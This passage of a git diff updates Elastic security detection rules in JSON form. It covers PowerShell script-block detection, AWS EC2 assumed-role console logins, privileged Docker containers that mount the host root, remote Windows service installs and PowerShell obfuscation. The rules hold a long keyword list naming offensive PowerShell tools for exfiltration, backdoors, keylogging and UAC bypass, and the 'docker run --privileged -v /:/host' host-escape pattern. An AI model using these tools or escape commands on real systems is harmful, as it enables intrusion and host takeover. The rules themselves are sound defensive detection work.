\"Invoke-DomainPasswordSpray\" or \"Get-FoxDump\" or\n \"New-HoneyHash\" or \"Invoke-DCSync\" or\n \"Invoke-PowerDump\" or \"Invoke-SSIDExfil\" or\n \"Invoke-PowerShellTCP\" or \"Add-Exfiltration\" or\n \"Do-Exfiltration\" or \"Invoke-DropboxUpload\" or\n \"Invoke-ExfilDataToGitHub\" or \"Invoke-EgressCheck\" or\n \"Invoke-PostExfil\" or \"Create-MultipleSessions\" or\n \"Invoke-NetworkRelay\" or \"New-GPOImmediateTask\" or\n \"Invoke-WMIDebugger\" or \"Invoke-SQLOSCMD\" or\n \"Invoke-SMBExec\" or \"Invoke-PSRemoting\" or\n \"Invoke-ExecuteMSBuild\" or \"Invoke-DCOM\" or\n \"Invoke-InveighRelay\" or \"Invoke-PsExec\" or\n \"Find-ActiveUsersWMI\" or\n \"Get-SystemDrivesWMI\" or \"Get-ActiveNICSWMI\" or\n \"Remove-Persistence\" or \"DNS_TXT_Pwnage\" or\n \"Execute-OnTime\" or \"HTTP-Backdoor\" or\n \"Add-ConstrainedDelegationBackdoor\" or \"Add-RegBackdoor\" or\n \"Add-ScrnSaveBackdoor\" or \"Gupt-Backdoor\" or\n \"Invoke-ADSBackdoor\" or \"Add-Persistence\" or\n \"Invoke-ResolverBackdoor\" or \"Invoke-EventLogBackdoor\" or\n \"Invoke-DeadUserBackdoor\" or \"Invoke-DisableMachineAcctChange\" or\n \"Invoke-AccessBinary\" or \"Add-NetUser\" or\n \"Invoke-Schtasks\" or \"Invoke-JSRatRegsvr\" or\n \"Invoke-JSRatRundll\" or \"Invoke-PoshRatHttps\" or\n \"Invoke-PsGcatAgent\" or \"Remove-PoshRat\" or\n \"Install-SSP\" or \"Invoke-BackdoorLNK\" or\n \"PowerBreach\" or \"InstallEXE-Persistence\" or\n \"RemoveEXE-Persistence\" or \"Install-ServiceLevel-Persistence\" or\n \"Remove-ServiceLevel-Persistence\" or \"Invoke-Prompt\" or\n \"Invoke-PacketCapture\" or \"Start-WebcamRecorder\" or\n \"Get-USBKeyStrokes\" or \"Invoke-KeeThief\" or\n \"Get-Keystrokes\" or \"Invoke-NetRipper\" or\n \"Get-EmailItems\" or \"Invoke-MailSearch\" or\n \"Invoke-SearchGAL\" or \"Get-WebCredentials\" or\n \"Start-CaptureServer\" or \"Invoke-PowerShellIcmp\" or\n \"Invoke-PowerShellTcpOneLine\" or \"Invoke-PowerShellTcpOneLineBind\" or\n \"Invoke-PowerShellUdp\" or \"Invoke-PowerShellUdpOneLine\" or\n \"Run-EXEonRemote\" or \"Download-Execute-PS\" or\n \"Out-RundllCommand\" or \"Set-RemoteWMI\" or\n \"Set-DCShadowPermissions\" or \"Invoke-PowerShellWMI\" or\n \"Invoke-Vnc\" or \"Invoke-LockWorkStation\" or\n \"Invoke-EternalBlue\" or \"Invoke-ShellcodeMSIL\" or\n \"Invoke-MetasploitPayload\" or \"Invoke-DowngradeAccount\" or\n \"Invoke-RunAs\" or \"ExetoText\" or\n \"Disable-SecuritySettings\" or \"Set-MacAttribute\" or\n \"Invoke-MS16032\" or \"Invoke-BypassUACTokenManipulation\" or\n \"Invoke-SDCLTBypass\" or \"Invoke-FodHelperBypass\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-EnvBypass\" or\n \"Get-ServiceUnquoted\" or \"Get-ServiceFilePermission\" or\n \"Get-ServicePermission\" or\n \"Enable-DuplicateToken\" or \"Invoke-PsUaCme\" or\n \"Invoke-Tater\" or \"Invoke-WScriptBypassUAC\" or\n \"Invoke-AllChecks\" or \"Find-TrustedDocuments\" or\n \"Invoke-Interceptor\" or \"Invoke-PoshRatHttp\" or\n \"Invoke-ExecCommandWMI\" or \"Invoke-KillProcessWMI\" or\n \"Invoke-CreateShareandExecute\" or \"Invoke-RemoteScriptWithOutput\" or\n \"Invoke-SchedJobManipulation\" or \"Invoke-ServiceManipulation\" or\n \"Invoke-PowerOptionsWMI\" or \"Invoke-DirectoryListing\" or\n \"Invoke-FileTransferOverWMI\" or \"Invoke-WMImplant\" or\n \"Invoke-WMIObfuscatedPSCommand\" or \"Invoke-WMIDuplicateClass\" or\n \"Invoke-WMIUpload\" or \"Invoke-WMIRemoteExtract\" or \"Invoke-winPEAS\" or\n \"Invoke-AzureHound\" or \"Invoke-SharpHound\" or \"Invoke-DownloadCradle\" or\n \"Invoke-AppPathBypass\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\")\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md", + "https://github.com/BC-SECURITY/Empire", + "https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 219 + }, + "id": "cde1bafa-9f01-4f43-a872-605b678968b0_219", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_208.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_208.json index c34671d10c3..c14b1087daf 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_208.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/d1e5e410-3e34-412e-9b1f-dd500b3b55cd_2.json b/packages/security_detection_engine/kibana/security_rule/d1e5e410-3e34-412e-9b1f-dd500b3b55cd_2.json deleted file mode 100644 index 341f2d1d55b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d1e5e410-3e34-412e-9b1f-dd500b3b55cd_2.json +++ /dev/null @@ -1,128 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a successful console login activity by an EC2 instance profile using an assumed role. This is uncommon behavior and could indicate an attacker using compromised credentials to further exploit an environment. An EC2 instance assumes a role using their EC2 ID as the session name. This rule looks for the pattern \"i-\" which is the beginning pattern for assumed role sessions started by an EC2 instance and a successful `ConsoleLogin` or `GetSigninToken` API call.", - "false_positives": [ - "This is very uncommon behavior and should result in minimal false positives, ensure validity of the triggered event and include exceptions where necessary." - ], - "from": "now-6m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "AWS EC2 Instance Console Login via Assumed Role", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS EC2 Instance Console Login via Assumed Role\n\nAWS EC2 instances can assume roles to access resources securely, using temporary credentials. This mechanism, while essential for legitimate operations, can be exploited by adversaries who gain access to EC2 credentials, allowing them to assume roles and perform unauthorized actions. The detection rule identifies unusual console login activities by EC2 instances, flagging potential misuse by checking for specific session patterns and successful login events, thus helping to uncover lateral movement or credential access attempts.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific event where event.dataset is \"aws.cloudtrail\" and event.provider is \"signin.amazonaws.com\" to gather more details about the login event.\n- Identify the EC2 instance associated with the session by examining the user.id field for the pattern \":i-\" and correlate it with known EC2 instance IDs in your environment.\n- Check the AWS CloudTrail logs for any other activities performed by the same assumed role session to identify any unauthorized actions or lateral movement attempts.\n- Investigate the source IP address and geolocation of the login event to determine if it aligns with expected access patterns for your organization.\n- Verify the IAM role policies and permissions associated with the assumed role to assess the potential impact of the unauthorized access.\n- Review recent changes to the IAM roles and policies to identify any unauthorized modifications that could have facilitated the assumed role access.\n- Contact the instance owner or relevant team to confirm if the login activity was expected or authorized, and take appropriate action if it was not.\n\n### False positive analysis\n\n- Routine administrative tasks: EC2 instances may assume roles for legitimate administrative purposes, such as automated deployments or maintenance tasks. To manage this, identify and whitelist known administrative session patterns or specific instance IDs that regularly perform these tasks.\n- Monitoring and logging services: Some monitoring or logging services might use assumed roles to access AWS resources for data collection. Review and exclude these services by identifying their specific session patterns or instance IDs.\n- Scheduled jobs or scripts: Automated scripts or scheduled jobs running on EC2 instances might assume roles for resource access. Document these jobs and create exceptions for their session patterns to prevent false alerts.\n- Development and testing environments: Instances in development or testing environments might frequently assume roles for testing purposes. Consider excluding these environments from the rule or creating specific exceptions for known testing activities.\n- Third-party integrations: Some third-party tools or integrations might require EC2 instances to assume roles for functionality. Verify these integrations and exclude their session patterns or instance IDs from triggering alerts.\n\n### Response and remediation\n\n- Immediately revoke the temporary credentials associated with the compromised EC2 instance to prevent further unauthorized access.\n- Isolate the affected EC2 instance from the network to contain any potential lateral movement by the attacker.\n- Conduct a thorough review of CloudTrail logs to identify any unauthorized actions performed using the assumed role and assess the extent of the compromise.\n- Reset and rotate all credentials and access keys associated with the compromised EC2 instance and any other potentially affected resources.\n- Implement stricter IAM policies and role permissions to limit the scope of access for EC2 instances, ensuring the principle of least privilege is enforced.\n- Notify the security operations team and relevant stakeholders about the incident for further investigation and to initiate any necessary legal or compliance procedures.\n- Enhance monitoring and alerting mechanisms to detect similar patterns of unusual console login activities in the future, ensuring rapid response to potential threats.", - "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"signin.amazonaws.com\"\n and event.action in (\"ConsoleLogin\", \"GetSigninToken\")\n and event.outcome == \"success\"\n and aws.cloudtrail.user_identity.type == \"AssumedRole\"\n and stringContains (user.id, \":i-\")\n", - "references": [ - "https://redcanary.com/blog/aws-sts/", - "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_enable-console-custom-url.html/" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "d1e5e410-3e34-412e-9b1f-dd500b3b55cd", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Data Source: AWS STS", - "Use Case: Identity and Access Audit", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.007", - "name": "Cloud Services", - "reference": "https://attack.mitre.org/techniques/T1021/007/" - } - ] - }, - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 2 - }, - "id": "d1e5e410-3e34-412e-9b1f-dd500b3b55cd_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d1f310cb-5921-4d37-bbdf-cfdab7a6df9c_1.json b/packages/security_detection_engine/kibana/security_rule/d1f310cb-5921-4d37-bbdf-cfdab7a6df9c_1.json new file mode 100644 index 00000000000..1d74a1e01ab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d1f310cb-5921-4d37-bbdf-cfdab7a6df9c_1.json @@ -0,0 +1,135 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the creation of privileged containers that mount host directories into the container's filesystem. Such configurations can be exploited by attackers to escape the container isolation and gain access to the host system, potentially leading to privilege escalation and lateral movement within the environment.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "endgame-*", + "logs-auditd_manager.auditd-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privileged Container Creation with Host Directory Mount", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Privileged Container Creation with Host Directory Mount\n\nThis rule flags creation of a privileged container that bind-mounts host directories into the container filesystem, breaking isolation and granting direct access to host files and devices. An attacker on a compromised node starts a privileged container via the runtime, bind-mounts the host root (/:) inside it, then chroots and alters critical files or services to seize host control, persist, and pivot.\n\n### Possible investigation steps\n\n- Retrieve the full process tree and execution context (user, controlling TTY, parent, remote source IP) to identify who initiated the container and whether it aligns with a sanctioned change.\n- Run runtime introspection to confirm the container\u2019s mounts and privileges (e.g., docker ps/inspect or CRI equivalents), capturing the container ID, exact hostPath mappings, image, entrypoint, and start time.\n- If orchestrated, correlate with Kubernetes events and kubelet logs at the same timestamp to find any Pod using privileged: true with hostPath volumes, recording the namespace, service account, controller, and requestor.\n- Review audit and file integrity telemetry after container start for host-impacting actions such as chroot into the mount, nsenter into host namespaces, or writes to critical paths (/etc/passwd, /etc/sudoers, /root/.ssh, /var/lib/kubelet, and systemd unit directories).\n- Assess image provenance and intent by resolving the image digest and registry, reviewing history/entrypoint for post-start tooling, and validating with service owners or allowlists whether this privileged host-mount is expected on this node.\n\n### False positive analysis\n\n- An administrator uses docker run --privileged with -v /:/host during a break-glass or troubleshooting session to edit host files or restart services, matching the pattern but aligned with an approved maintenance procedure.\n- Automated provisioning or upgrade workflows intentionally start a privileged container that bind-mounts / to apply system configuration, install packages, or manage kernel modules during node bootstrap, producing an expected event.\n\n### Response and remediation\n\n- Immediately stop and remove the privileged container by its ID using docker, cordon the node to prevent scheduling, and temporarily disable the Docker/CRI socket to block further privileged runs.\n- Preserve forensic artifacts (docker inspect output, container image and filesystem, bash history, /var/log) and remediate by diffing and restoring critical paths (/etc, /root/.ssh, /etc/systemd/system, /var/lib/kubelet), removing rogue users, SSH keys, and systemd units.\n- Rotate credentials potentially exposed by the host mount (SSH keys, kubelet certs, cloud tokens under /var/lib/kubelet or /root), patch the container runtime, and uncordon or rejoin the node only after verifying privileged runs and host-root mounts are blocked.\n- Escalate to incident response if the mount included \"/\" or if evidence shows chroot or nsenter into host namespaces or writes to /etc/passwd, /etc/sudoers, or systemd unit files, and initiate host reimage and broader fleet scoping.\n- Enforce controls that deny --privileged and hostPath of \"/\" via admission policy (Pod Security Standards, Kyverno, OPA Gatekeeper), drop CAP_SYS_ADMIN with seccomp/AppArmor, enable Docker userns-remap and no-new-privileges, and restrict membership in the docker group.\n- Establish a break-glass approval workflow and an allowlist for legitimate host mounts, enable file integrity monitoring on /etc and kubelet directories, and add runtime rules to alert and block future docker run -v /:/host attempts.", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\nprocess.name == \"docker\" and process.args == \"--privileged\" and process.args == \"run\" and\nprocess.args == \"-v\" and process.args like \"/:/*\" and\nnot (\n (process.args == \"aktosecurity/mirror-api-logging:k8s_ebpf\" and process.args == \"akto-api-security-traffic-collector\") or\n (process.args like \"goharbor/prepare:*\" and process.args in (\"/:/hostfs\", \"/:/hostfs/\"))\n)\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2", + "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack", + "https://unit42.paloaltonetworks.com/container-escape-techniques/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d1f310cb-5921-4d37-bbdf-cfdab7a6df9c", + "setup": "## Setup\nThis rule requires data coming in from Elastic Defend.\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + }, + { + "id": "T1609", + "name": "Container Administration Command", + "reference": "https://attack.mitre.org/techniques/T1609/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d1f310cb-5921-4d37-bbdf-cfdab7a6df9c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_109.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_109.json deleted file mode 100644 index 77753b34a13..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_109.json +++ /dev/null @@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a network logon followed by Windows service creation with same LogonId. This could be indicative of lateral movement, but will be noisy if commonly done by administrators.\"", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Remote Windows Service Installed", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Remote Windows Service Installed\n\nWindows services are crucial for running background processes. Adversaries exploit this by installing services remotely to maintain persistence or move laterally within a network. The detection rule identifies suspicious service installations following a network logon, excluding known legitimate services, to flag potential unauthorized activities. This helps in identifying and mitigating threats early.\n\n### Possible investigation steps\n\n- Review the source IP address from the authentication event to determine if it is from a known or trusted network segment. Investigate any unfamiliar or suspicious IP addresses.\n- Check the winlog.logon.id to correlate the logon session with the service installation event, ensuring they are part of the same session.\n- Investigate the user account associated with the logon session to determine if the activity aligns with their typical behavior or role within the organization.\n- Examine the service file path from the service-installed event to identify if it is a known or legitimate application. Pay special attention to any paths not excluded in the query.\n- Look into the history of the computer where the service was installed (winlog.computer_name) for any previous suspicious activities or alerts.\n- Assess the timing and frequency of similar events to determine if this is an isolated incident or part of a broader pattern of suspicious behavior.\n\n### False positive analysis\n\n- Administrative activities can trigger false positives when administrators frequently install or update services remotely. To manage this, create exceptions for known administrative accounts or specific IP addresses used by IT staff.\n- Legitimate software installations or updates may appear as suspicious service installations. Maintain an updated list of authorized software paths and exclude these from the detection rule.\n- Automated deployment tools like PDQ Deploy or Veeam Backup can cause false positives. Identify and exclude the service paths associated with these tools to reduce noise.\n- Scheduled tasks that install or update services as part of routine maintenance can be mistaken for threats. Document and exclude these tasks from the rule to prevent unnecessary alerts.\n- Internal security tools that perform regular checks or updates may also trigger alerts. Ensure these tools are recognized and their service paths are excluded from the detection criteria.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further lateral movement by the adversary. This can be done by disabling network interfaces or using network segmentation tools.\n- Terminate any unauthorized services identified by the alert to stop any malicious processes from running. Use task management tools or command-line utilities to stop and disable these services.\n- Conduct a thorough review of recent logon events and service installations on the affected system to identify any additional unauthorized activities or compromised accounts.\n- Change passwords for any accounts that were used in the unauthorized service installation, especially if they have administrative privileges, to prevent further unauthorized access.\n- Restore the affected system from a known good backup if any malicious changes or persistence mechanisms are detected that cannot be easily remediated.\n- Implement network monitoring and alerting for similar suspicious activities, such as unexpected service installations or network logons, to enhance detection and response capabilities.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or accounts have been compromised.", - "query": "sequence by winlog.logon.id, winlog.computer_name with maxspan=1m\n[authentication where event.action == \"logged-in\" and winlog.logon.type : \"Network\" and\nevent.outcome==\"success\" and source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\"]\n[iam where event.action == \"service-installed\" and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and\n not winlog.event_data.ServiceFileName :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")]\n", - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.ServiceFileName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectLogonId", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.id", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "d33ea3bf-9a11-463e-bd46-f648f2a0f4b1", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Persistence", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/", - "subtechnique": [ - { - "id": "T1543.003", - "name": "Windows Service", - "reference": "https://attack.mitre.org/techniques/T1543/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 109 - }, - "id": "d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_109", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_5.json b/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_5.json new file mode 100644 index 00000000000..5567da17518 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_5.json @@ -0,0 +1,178 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use backtick-escaped characters inside ${} variable expansion as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and 